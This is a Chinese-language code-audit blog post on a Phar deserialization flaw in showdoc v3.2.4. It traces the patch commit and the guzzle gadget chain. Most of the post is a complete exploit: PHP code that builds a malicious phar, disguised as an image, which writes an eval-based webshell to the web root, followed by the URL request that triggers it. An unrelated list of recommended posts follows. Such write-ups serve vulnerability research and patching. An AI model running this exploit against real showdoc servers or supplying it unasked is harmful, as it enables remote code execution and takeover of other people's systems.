【代码审计】star7th/showdoc:v3.2.4 Phar反序列化写webshell

目录

漏洞速览

复现


漏洞速览

微步在线X情报社区-威胁情报查询_威胁分析平台_开放社区

主要就是两步,sql注入拿到用户token,再以用户身份上传恶意phar包打phar反序列化

因为文件上传对用户权限没有限制,故本文对sql注入部分不做探讨。只关注假设已经拿到用户身份(如服务开放注册接口)后如何寻找反序列化链子并利用。

复现

关注官方的commit

https://github.com/star7th/showdoc/commit/805983518081660594d752573273b8fb5cbbdb30

这里public->private的过程,再结合new_is_writebale的is_dir功能,不难想到是对phar反序列化的patch

showdoc是基于thinkphp3.2.3的,直接拿现成的反序列化链子打RCE不很现实

关注composer.lock(类比pom.xml)寻找可用依赖

注意到guzzlehttp/guzzle

可以直接打现成的链子写文件,分析文章如下

popchain与对应poc的构造分析 - FreeBuf网络安全行业门户

复制代码
<?php
namespace GuzzleHttp\Cookie {
    class CookieJar
    {
        /** @var SetCookie[] Loaded cookie data */
        private $cookies;
        public function __construct()
        {
            $this->cookies = array(new SetCookie());
        }
        /** @var bool */
        private $strictMode;
    }
    class FileCookieJar extends CookieJar
    {
        private $filename = "/var/www/html/shell.php";
        private $storeSessionCookies = true;
    }
    class SetCookie
    {
        private $data = array('Expires' => '<?php eval($_POST[\'Z3r4y\']);?>');
    }
}
namespace {
    $phar = new Phar("doc.phar");
    $phar->startBuffering();
    $phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");
    $o = new \GuzzleHttp\Cookie\FileCookieJar();
    $phar->setMetadata($o);
    $phar->addFromString("test.txt", "test");
    $phar->stopBuffering();
}

生成phar包后改后缀为png直接上传

成功上传后回显文件路径

再触发phar反序列化

复制代码
/server/index.php?s=/home/index/new_is_writeable&file=phar:///var/www/html/Public/Uploads/2024-06-04/665ede741b7e5.png
相关推荐
Jerry404_NotFound14 天前
求助帖:学Java开发方向还是网络安全方向前景好
java·开发语言·python·安全·网络安全·渗透·代码审计
starstarzz14 天前
解决idea无法正常加载lombok包
java·ide·spring·intellij-idea·springboot·web
码农不惑14 天前
Rust使用tokio(二)HTTPS相关
https·rust·web·openssl
Zik----17 天前
Spring Boot 管理系统项目解读
spring boot·web
終不似少年遊*17 天前
【软测】接口测试 - 用postman测试软件登录模块
软件测试·测试工具·json·postman·web·可用性测试
kali-Myon17 天前
攻防世界[level7]-Web_php_wrong_nginx_config
前端·nginx·安全·php·web·ctf·攻防世界
pixle018 天前
前端 EventSource(SSE)实时通信使用指南(EventSource-polyfill)
前端·web·sse·eventsource·polyfill
Java永无止境19 天前
Web后端基础:数据库
java·数据库·javaweb·web
未来之窗软件服务19 天前
thinkphp ThinkPHP3.2.3完全开发手册
thinkphp
終不似少年遊*20 天前
【软测】node.js辅助生成测试报告
软件测试·测试工具·node.js·postman·web